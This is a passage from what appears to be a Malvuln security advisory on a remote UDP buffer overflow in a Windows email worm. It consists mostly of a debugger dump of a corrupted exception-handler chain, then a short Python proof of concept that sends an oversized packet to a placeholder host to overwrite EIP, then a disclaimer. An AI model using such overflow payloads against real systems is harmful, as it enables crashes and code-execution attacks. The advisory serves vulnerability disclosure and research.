ntdll!ExecuteHandler2+44 (773e9d70) 03339c44: ntdll!ExecuteHandler2+44 (773e9d70) 0333a1f4: ntdll!ExecuteHandler2+44 (773e9d70) 0333a7a4: ntdll!ExecuteHandler2+44 (773e9d70) 0333ad54: ntdll!ExecuteHandler2+44 (773e9d70) 0333b304: ntdll!ExecuteHandler2+44 (773e9d70) 0333b8b4: ntdll!ExecuteHandler2+44 (773e9d70) 0333be64: ntdll!ExecuteHandler2+44 (773e9d70) 0333c414: ntdll!ExecuteHandler2+44 (773e9d70) 0333c9c4: ntdll!ExecuteHandler2+44 (773e9d70) 0333cf74: ntdll!ExecuteHandler2+44 (773e9d70) 0333d524: ntdll!ExecuteHandler2+44 (773e9d70) 0333dad4: ntdll!ExecuteHandler2+44 (773e9d70) 0333e084: ntdll!ExecuteHandler2+44 (773e9d70) 0333e634: ntdll!ExecuteHandler2+44 (773e9d70) 0333ebe4: ntdll!ExecuteHandler2+44 (773e9d70) 0333f194: ntdll!ExecuteHandler2+44 (773e9d70) 0333f744: ntdll!ExecuteHandler2+44 (773e9d70) 0333fcf4: ntdll!ExecuteHandler2+44 (773e9d70) 033402a4: ntdll!ExecuteHandler2+44 (773e9d70) 03340854: ntdll!ExecuteHandler2+44 (773e9d70) 03340e04: ntdll!ExecuteHandler2+44 (773e9d70) 033413b4: ntdll!ExecuteHandler2+44 (773e9d70) 03341964: ntdll!ExecuteHandler2+44 (773e9d70) 03341f14: ntdll!ExecuteHandler2+44 (773e9d70) 033424c4: ntdll!ExecuteHandler2+44 (773e9d70) 03342a74: ntdll!ExecuteHandler2+44 (773e9d70) 03343024: ntdll!ExecuteHandler2+44 (773e9d70) 033435d4: ntdll!ExecuteHandler2+44 (773e9d70) 03343b84: ntdll!ExecuteHandler2+44 (773e9d70) 03344134: ntdll!ExecuteHandler2+44 (773e9d70) 033446e4: ntdll!ExecuteHandler2+44 (773e9d70) 03344c94: ntdll!ExecuteHandler2+44 (773e9d70) 03345244: ntdll!ExecuteHandler2+44 (773e9d70) 033457f4: ntdll!ExecuteHandler2+44 (773e9d70) 03345da4: ntdll!ExecuteHandler2+44 (773e9d70) 03346354: ntdll!ExecuteHandler2+44 (773e9d70) 03346904: ntdll!ExecuteHandler2+44 (773e9d70) 03346eb4: ntdll!ExecuteHandler2+44 (773e9d70) 03347464: ntdll!ExecuteHandler2+44 (773e9d70) 03347a14: ntdll!ExecuteHandler2+44 (773e9d70) 03347fc4: ntdll!ExecuteHandler2+44 (773e9d70) 03348574: ntdll!ExecuteHandler2+44 (773e9d70) 03348b24: ntdll!ExecuteHandler2+44 (773e9d70) 033490d4: ntdll!ExecuteHandler2+44 (773e9d70) 03349684: ntdll!ExecuteHandler2+44 (773e9d70) 03349c34: ntdll!ExecuteHandler2+44 (773e9d70) 0334a1e4: ntdll!ExecuteHandler2+44 (773e9d70) 0334a794: ntdll!ExecuteHandler2+44 (773e9d70) 0334ad44: ntdll!ExecuteHandler2+44 (773e9d70) 0334b2f4: ntdll!ExecuteHandler2+44 (773e9d70) 0334b8a4: ntdll!ExecuteHandler2+44 (773e9d70) 0334be54: ntdll!ExecuteHandler2+44 (773e9d70) 0334c404: ntdll!ExecuteHandler2+44 (773e9d70) 0334c9b4: ntdll!ExecuteHandler2+44 (773e9d70) 0334cf64: ntdll!ExecuteHandler2+44 (773e9d70) 0334d514: ntdll!ExecuteHandler2+44 (773e9d70) 0334dac4: ntdll!ExecuteHandler2+44 (773e9d70) 0334e074: ntdll!ExecuteHandler2+44 (773e9d70) 0334e624: ntdll!ExecuteHandler2+44 (773e9d70) 0334ebd4: ntdll!ExecuteHandler2+44 (773e9d70) 0334f184: ntdll!ExecuteHandler2+44 (773e9d70) 0334f734: ntdll!ExecuteHandler2+44 (773e9d70) 0334fce4: ntdll!ExecuteHandler2+44 (773e9d70) 03350294: ntdll!ExecuteHandler2+44 (773e9d70) 03350844: ntdll!ExecuteHandler2+44 (773e9d70) 03350df4: ntdll!ExecuteHandler2+44 (773e9d70) 033513a4: ntdll!ExecuteHandler2+44 (773e9d70) 03351954: ntdll!ExecuteHandler2+44 (773e9d70) 03351f04: ntdll!ExecuteHandler2+44 (773e9d70) 033524b4: ntdll!ExecuteHandler2+44 (773e9d70) 03352a64: ntdll!ExecuteHandler2+44 (773e9d70) 03353014: ntdll!ExecuteHandler2+44 (773e9d70) 033535c4: ntdll!ExecuteHandler2+44 (773e9d70) 03353b74: ntdll!ExecuteHandler2+44 (773e9d70) 03354124: ntdll!ExecuteHandler2+44 (773e9d70) 033546d4: ntdll!ExecuteHandler2+44 (773e9d70) 03354c84: ntdll!ExecuteHandler2+44 (773e9d70) 03355234: ntdll!ExecuteHandler2+44 (773e9d70) 033557e4: ntdll!ExecuteHandler2+44 (773e9d70) 03355d94: ntdll!ExecuteHandler2+44 (773e9d70) 03356344: ntdll!ExecuteHandler2+44 (773e9d70) 033568f4: ntdll!ExecuteHandler2+44 (773e9d70) 03356ea4: ntdll!ExecuteHandler2+44 (773e9d70) 03357454: ntdll!ExecuteHandler2+44 (773e9d70) 03357a04: ntdll!ExecuteHandler2+44 (773e9d70) 03357fb4: ntdll!ExecuteHandler2+44 (773e9d70) 03358564: ntdll!ExecuteHandler2+44 (773e9d70) 03358b14: ntdll!ExecuteHandler2+44 (773e9d70) 033590c4: ntdll!ExecuteHandler2+44 (773e9d70) 03359674: ntdll!ExecuteHandler2+44 (773e9d70) 03359c24: ntdll!ExecuteHandler2+44 (773e9d70) 0335a1d4: ntdll!ExecuteHandler2+44 (773e9d70) 0335a784: ntdll!ExecuteHandler2+44 (773e9d70) 0335ad34: ntdll!ExecuteHandler2+44 (773e9d70) 0335b2e4: ntdll!ExecuteHandler2+44 (773e9d70) 0335b894: ntdll!ExecuteHandler2+44 (773e9d70) 0335be44: ntdll!ExecuteHandler2+44 (773e9d70) 0335c3f4: ntdll!ExecuteHandler2+44 (773e9d70) 0335c9a4: ntdll!ExecuteHandler2+44 (773e9d70) 0335cf54: ntdll!ExecuteHandler2+44 (773e9d70) 0335d504: ntdll!ExecuteHandler2+44 (773e9d70) 0335dab4: ntdll!ExecuteHandler2+44 (773e9d70) 0335e064: ntdll!ExecuteHandler2+44 (773e9d70) 0335e614: ntdll!ExecuteHandler2+44 (773e9d70) 0335ebc4: ntdll!ExecuteHandler2+44 (773e9d70) 0335f174: ntdll!ExecuteHandler2+44 (773e9d70) 0335f724: ntdll!ExecuteHandler2+44 (773e9d70) 0335fcd4: ntdll!ExecuteHandler2+44 (773e9d70) 03360284: ntdll!ExecuteHandler2+44 (773e9d70) 03360834: ntdll!ExecuteHandler2+44 (773e9d70) 03360de4: ntdll!ExecuteHandler2+44 (773e9d70) 03361394: ntdll!ExecuteHandler2+44 (773e9d70) 03361944: ntdll!ExecuteHandler2+44 (773e9d70) 03361ef4: ntdll!ExecuteHandler2+44 (773e9d70) 033624a4: ntdll!ExecuteHandler2+44 (773e9d70) 03362a54: ntdll!ExecuteHandler2+44 (773e9d70) 03363004: ntdll!ExecuteHandler2+44 (773e9d70) 033635b4: ntdll!ExecuteHandler2+44 (773e9d70) 03363b64: ntdll!ExecuteHandler2+44 (773e9d70) 03364114: ntdll!ExecuteHandler2+44 (773e9d70) 033646c4: ntdll!ExecuteHandler2+44 (773e9d70) 03364c74: ntdll!ExecuteHandler2+44 (773e9d70) 03365224: ntdll!ExecuteHandler2+44 (773e9d70) 033657d4: ntdll!ExecuteHandler2+44 (773e9d70) 03365d84: ntdll!ExecuteHandler2+44 (773e9d70) 03366334: ntdll!ExecuteHandler2+44 (773e9d70) 033668e4: ntdll!ExecuteHandler2+44 (773e9d70) 03366e94: ntdll!ExecuteHandler2+44 (773e9d70) 03367444: ntdll!ExecuteHandler2+44 (773e9d70) 033679f4: ntdll!ExecuteHandler2+44 (773e9d70) 03367fa4: ntdll!ExecuteHandler2+44 (773e9d70) 03368554: ntdll!ExecuteHandler2+44 (773e9d70) 03368b04: ntdll!ExecuteHandler2+44 (773e9d70) 033690b4: ntdll!ExecuteHandler2+44 (773e9d70) 03369664: ntdll!ExecuteHandler2+44 (773e9d70) 03369c14: ntdll!ExecuteHandler2+44 (773e9d70) 0336a1c4: ntdll!ExecuteHandler2+44 (773e9d70) 0336a774: ntdll!ExecuteHandler2+44 (773e9d70) 0336ad24: ntdll!ExecuteHandler2+44 (773e9d70) 0336b2d4: ntdll!ExecuteHandler2+44 (773e9d70) 0336b884: ntdll!ExecuteHandler2+44 (773e9d70) 0336be34: ntdll!ExecuteHandler2+44 (773e9d70) 0336c3e4: ntdll!ExecuteHandler2+44 (773e9d70) 0336c994: ntdll!ExecuteHandler2+44 (773e9d70) 0336cf44: ntdll!ExecuteHandler2+44 (773e9d70) 0336d4f4: ntdll!ExecuteHandler2+44 (773e9d70) 0336daa4: ntdll!ExecuteHandler2+44 (773e9d70) 0336e054: ntdll!ExecuteHandler2+44 (773e9d70) 0336e604: ntdll!ExecuteHandler2+44 (773e9d70) 0336ebb4: ntdll!ExecuteHandler2+44 (773e9d70) 0336f164: ntdll!ExecuteHandler2+44 (773e9d70) 0336f714: ntdll!ExecuteHandler2+44 (773e9d70) 0336fcc4: ntdll!ExecuteHandler2+44 (773e9d70) 03370274: ntdll!ExecuteHandler2+44 (773e9d70) 03370824: ntdll!ExecuteHandler2+44 (773e9d70) 03370dd4: ntdll!ExecuteHandler2+44 (773e9d70) 03371384: ntdll!ExecuteHandler2+44 (773e9d70) 03371934: ntdll!ExecuteHandler2+44 (773e9d70) 03371ee4: ntdll!ExecuteHandler2+44 (773e9d70) 03372494: ntdll!ExecuteHandler2+44 (773e9d70) 03372a44: ntdll!ExecuteHandler2+44 (773e9d70) 03372ff4: ntdll!ExecuteHandler2+44 (773e9d70) 033735a4: ntdll!ExecuteHandler2+44 (773e9d70) 03373b54: ntdll!ExecuteHandler2+44 (773e9d70) 03374104: ntdll!ExecuteHandler2+44 (773e9d70) 033746b4: ntdll!ExecuteHandler2+44 (773e9d70) 03374c64: ntdll!ExecuteHandler2+44 (773e9d70) 03375214: ntdll!ExecuteHandler2+44 (773e9d70) 033757c4: ntdll!ExecuteHandler2+44 (773e9d70) 03375d74: ntdll!ExecuteHandler2+44 (773e9d70) 03376324: ntdll!ExecuteHandler2+44 (773e9d70) 033768d4: ntdll!ExecuteHandler2+44 (773e9d70) 03376e84: ntdll!ExecuteHandler2+44 (773e9d70) 03377434: ntdll!ExecuteHandler2+44 (773e9d70) 033779e4: ntdll!ExecuteHandler2+44 (773e9d70) 03377f94: ntdll!ExecuteHandler2+44 (773e9d70) 03378544: ntdll!ExecuteHandler2+44 (773e9d70) 03378af4: ntdll!ExecuteHandler2+44 (773e9d70) 033790a4: ntdll!ExecuteHandler2+44 (773e9d70) 03379654: ntdll!ExecuteHandler2+44 (773e9d70) 03379c04: ntdll!ExecuteHandler2+44 (773e9d70) 0337a1b4: ntdll!ExecuteHandler2+44 (773e9d70) 0337a764: ntdll!ExecuteHandler2+44 (773e9d70) 0337ad14: ntdll!ExecuteHandler2+44 (773e9d70) 0337b2c4: ntdll!ExecuteHandler2+44 (773e9d70) 0337b874: ntdll!ExecuteHandler2+44 (773e9d70) 0337be24: ntdll!ExecuteHandler2+44 (773e9d70) 0337c3d4: ntdll!ExecuteHandler2+44 (773e9d70) 0337c984: ntdll!ExecuteHandler2+44 (773e9d70) 0337cf34: ntdll!ExecuteHandler2+44 (773e9d70) 0337d4e4: ntdll!ExecuteHandler2+44 (773e9d70) 0337da94: ntdll!ExecuteHandler2+44 (773e9d70) 0337e044: ntdll!ExecuteHandler2+44 (773e9d70) 0337e5f4: ntdll!ExecuteHandler2+44 (773e9d70) 0337eba4: ntdll!ExecuteHandler2+44 (773e9d70) 0337f154: ntdll!ExecuteHandler2+44 (773e9d70) 0337f704: ntdll!ExecuteHandler2+44 (773e9d70) 0337fcb4: ntdll!ExecuteHandler2+44 (773e9d70) 03380264: ntdll!ExecuteHandler2+44 (773e9d70) 03380814: ntdll!ExecuteHandler2+44 (773e9d70) 03380dc4: ntdll!ExecuteHandler2+44 (773e9d70) 03381374: ntdll!ExecuteHandler2+44 (773e9d70) 03381924: ntdll!ExecuteHandler2+44 (773e9d70) 03381ed4: ntdll!ExecuteHandler2+44 (773e9d70) 03382484: ntdll!ExecuteHandler2+44 (773e9d70) 03382a34: ntdll!ExecuteHandler2+44 (773e9d70) 03382fe4: ntdll!ExecuteHandler2+44 (773e9d70) 03383594: ntdll!ExecuteHandler2+44 (773e9d70) 03383b44: ntdll!ExecuteHandler2+44 (773e9d70) 033840f4: ntdll!ExecuteHandler2+44 (773e9d70) 033846a4: ntdll!ExecuteHandler2+44 (773e9d70) 03384c54: ntdll!ExecuteHandler2+44 (773e9d70) 03385204: ntdll!ExecuteHandler2+44 (773e9d70) 033857b4: ntdll!ExecuteHandler2+44 (773e9d70) 03385d64: ntdll!ExecuteHandler2+44 (773e9d70) 03386314: ntdll!ExecuteHandler2+44 (773e9d70) 033868c4: ntdll!ExecuteHandler2+44 (773e9d70) 03386e74: ntdll!ExecuteHandler2+44 (773e9d70) 03387424: ntdll!ExecuteHandler2+44 (773e9d70) 033879d4: ntdll!ExecuteHandler2+44 (773e9d70) 03387f84: ntdll!ExecuteHandler2+44 (773e9d70) 03388534: ntdll!ExecuteHandler2+44 (773e9d70) 03388ae4: ntdll!ExecuteHandler2+44 (773e9d70) 03389094: ntdll!ExecuteHandler2+44 (773e9d70) 03389644: ntdll!ExecuteHandler2+44 (773e9d70) 03389bf4: ntdll!ExecuteHandler2+44 (773e9d70) 0338a1a4: ntdll!ExecuteHandler2+44 (773e9d70) 0338a754: ntdll!ExecuteHandler2+44 (773e9d70) 0338ad04: ntdll!ExecuteHandler2+44 (773e9d70) 0338b2b4: ntdll!ExecuteHandler2+44 (773e9d70) 0338b864: ntdll!ExecuteHandler2+44 (773e9d70) 0338be14: ntdll!ExecuteHandler2+44 (773e9d70) 0338c3c4: ntdll!ExecuteHandler2+44 (773e9d70) 0338c974: ntdll!ExecuteHandler2+44 (773e9d70) 0338cf24: ntdll!ExecuteHandler2+44 (773e9d70) 0338d4d4: ntdll!ExecuteHandler2+44 (773e9d70) 0338da84: ntdll!ExecuteHandler2+44 (773e9d70) 0338e034: ntdll!ExecuteHandler2+44 (773e9d70) 0338ff68: 52525252 Invalid exception stack at 41414141 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=53 def doit(): s=socket(AF_INET, SOCK_DGRAM) s.connect((MALWARE_HOST, PORT)) #R for EIP PACKOLA="A"*324+"R"*8 s.send(PACKOLA) s.close() print("Email-Worm.Win32.Agent.gi / Remote UDP Buffer Overflow (SYSTEM)") print("MD5: 74e65773735f977185f6a09f1472ea46"); print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).